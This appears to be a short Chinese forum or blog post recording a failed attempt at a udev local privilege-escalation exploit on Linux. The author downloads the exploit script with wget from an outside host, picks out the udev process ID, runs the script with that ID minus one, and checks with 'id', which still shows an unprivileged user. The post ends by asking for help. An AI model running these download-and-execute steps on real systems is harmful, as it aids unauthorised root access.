1.下载攻击脚本
[[email protected] ~]$ wget http://www.extmail .org/source/exploit-udev-8478 --2018-04-02 01:21:00-- http://www.extmail/ Resolving www.extmail... failed: Name or service not known. wget: unable to resolve host address “www.extmail” --2018-04-02 01:21:00-- http://.org/source/exploit-udev-8478 Resolving .org... failed: Name or service not known. wget: unable to resolve host address “.org” [[email protected] ~]$ wget http://www.extmail.org/source/exploit-udev-8478 --2018-04-02 01:21:14-- http://www.extmail.org/source/exploit-udev-8478 Resolving www.extmail.org... 124.172.184.131 Connecting to www.extmail.org|124.172.184.131|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3367 (3.3K) [application/octet-stream] Saving to: “exploit-udev-8478” 100%[===============================================================================> 2018-04-02 01:21:15 (351 KB/s) - “exploit-udev-8478” saved [3367/3367]
2.获得udev进程号
[[email protected] ~]$ ps ax|grep udev|grep -v grep|awk {‘print $1‘} 581 2508 2509
3.获得udev进程号,然后将此数字减1作为exploit-udev-8478的参数,执行脚本
[[email protected] ~]$ sh exploit-udev-8478 580 suid.c: In function ‘main’: suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
4.输入id进行验证
1 sh-4.1$ id 2 uid=502(test) gid=502(test) groups=502(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
多次实验仍未成功,大佬看到求指点,应该是我的linux版本问题把